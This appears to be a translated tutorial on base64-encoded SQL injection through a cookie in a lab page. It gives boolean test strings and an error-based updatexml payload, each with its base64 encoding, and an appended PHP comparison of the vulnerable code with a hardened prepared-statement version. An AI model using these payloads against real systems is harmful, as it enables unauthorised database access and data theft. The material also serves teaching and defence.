
SQL injection vulnerability (XIII) Base64 injection

2022-06-22 06:16:00 A τθ

I. Base64-encoded injection

base64 is generally used to encode data for transmission, for example in e-mail, and it is also used to encode images stored in web pages. The benefit of encoding is that it prevents data loss. Many websites also pass data as base64: a search bar or an id parameter, for instance, may receive its value base64-encoded. In PHP, the base64_encode() function base64-encodes a string, and the result can be decoded again.

Encoding and decoding process:
1 -> base64 encode -> MQ== -> base64 decode -> 1

Base64-encoded injection can bypass gpc injection filtering, because the encoded string contains no special characters. The program decodes the encoded string, splices it into the SQL statement, and then executes it, which produces the SQL injection.

II. Code analysis

In the vulnerable code, the program first checks whether a POST submit parameter was sent, then uses $_COOKIE['uname'] to read the account name passed in the cookie and splices it into the SQL query.

The line $cookee = base64_decode($cookee); decodes the value that was passed in, so the data sent in $cookee must be base64-encoded first; otherwise decoding fails and an error results.


III. Testing for base64-encoded injection

1. Test the injection point

First check whether the website passes any base64-encoded data, for example in an id value or a search module. If a value ends in something like ==, base64-decode it and test.

Original string         base64 encoding
admin'and 1=1--         YWRtaW4nYW5kIDE9MS0tIA==
admin'and 1=2--         YWRtaW4nYW5kIDE9Mi0tIA==

The test page takes its input from a cookie, so the value has to be submitted in the cookie, and there is a parenthesis that needs to be closed.

Original string         base64 encoding
admin') and 1=1--       YWRtaW4nKSBhbmQgMT0xLS0gIA==
admin') and 1=2--       YWRtaW4nKSBhbmQgMT0yLS0gIA==


The page returned for the first submission contains admin; the page returned for the second does not. The two pages return different results, so SQL injection exists.

2. Query sensitive information

This code calls the mysqli_error function, so error-based injection can be used to obtain further sensitive information.
admin') and (updatexml(1,concat(0x7e,(select user()),0x7e),1))-- 
Base64-encode it:
YWRtaW4nKWFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB1c2VyKCkpLDB4N2UpLDEpKS0tICA=
Submit it to obtain the sensitive information.
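
The decode-then-splice pattern from the code analysis above, next to a hardened version, as an added example that is not the page's or the tested application's own code. It assumes a constructed users table in in-memory SQLite through PDO (the page's code uses mysqli) and the hypothetical function names lookup_vulnerable and lookup_hardened; the two encoded strings are the ones from the table in the injection-point test above.

```php
<?php
// Added example, not the page's code. The users table is constructed sample data.
// Assumption: PDO with pdo_sqlite is available (the page's code uses mysqli).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (id INTEGER, username TEXT)");
$db->exec("INSERT INTO users VALUES (1, 'admin')");

// Pattern from the code analysis: decode the cookie, splice it into the SQL text.
function lookup_vulnerable(PDO $db, string $cookie): ?string {
    $cookee = base64_decode($cookie);
    $sql = "SELECT username FROM users WHERE username=('$cookee') LIMIT 0,1";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['username'] : null;
}

// Hardened: strict decode, allow-list the decoded value, bind it as a parameter.
function lookup_hardened(PDO $db, string $cookie): ?string {
    $name = base64_decode($cookie, true);   // strict mode: false on invalid input
    if ($name === false || !preg_match('/^[A-Za-z0-9_]{1,32}$/D', $name)) {
        return null;                        // reject before touching the database
    }
    try {
        $stmt = $db->prepare("SELECT username FROM users WHERE username = ? LIMIT 0,1");
        $stmt->execute([$name]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row ? $row['username'] : null;
    } catch (PDOException $e) {
        error_log($e->getMessage());        // log server-side, never echo to the page
        return null;
    }
}

$cookies = [
    'admin'      => base64_encode('admin'),
    '1=1 string' => 'YWRtaW4nKSBhbmQgMT0xLS0gIA==',  // from the page's table
    '1=2 string' => 'YWRtaW4nKSBhbmQgMT0yLS0gIA==',  // from the page's table
];
foreach ($cookies as $label => $cookie) {
    // A quote-escaping filter on the raw cookie finds nothing to escape.
    $filtered = addslashes($cookie) !== $cookie;
    printf("%-11s escaped=%s vulnerable=%s hardened=%s\n", $label,
        var_export($filtered, true),
        var_export(lookup_vulnerable($db, $cookie), true),
        var_export(lookup_hardened($db, $cookie), true));
}
```

The vulnerable lookup answers differently for the two strings from the page, while the hardened lookup rejects both and still resolves the plain admin cookie. Logging driver errors instead of printing them also removes the error output that the second test step depends on.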

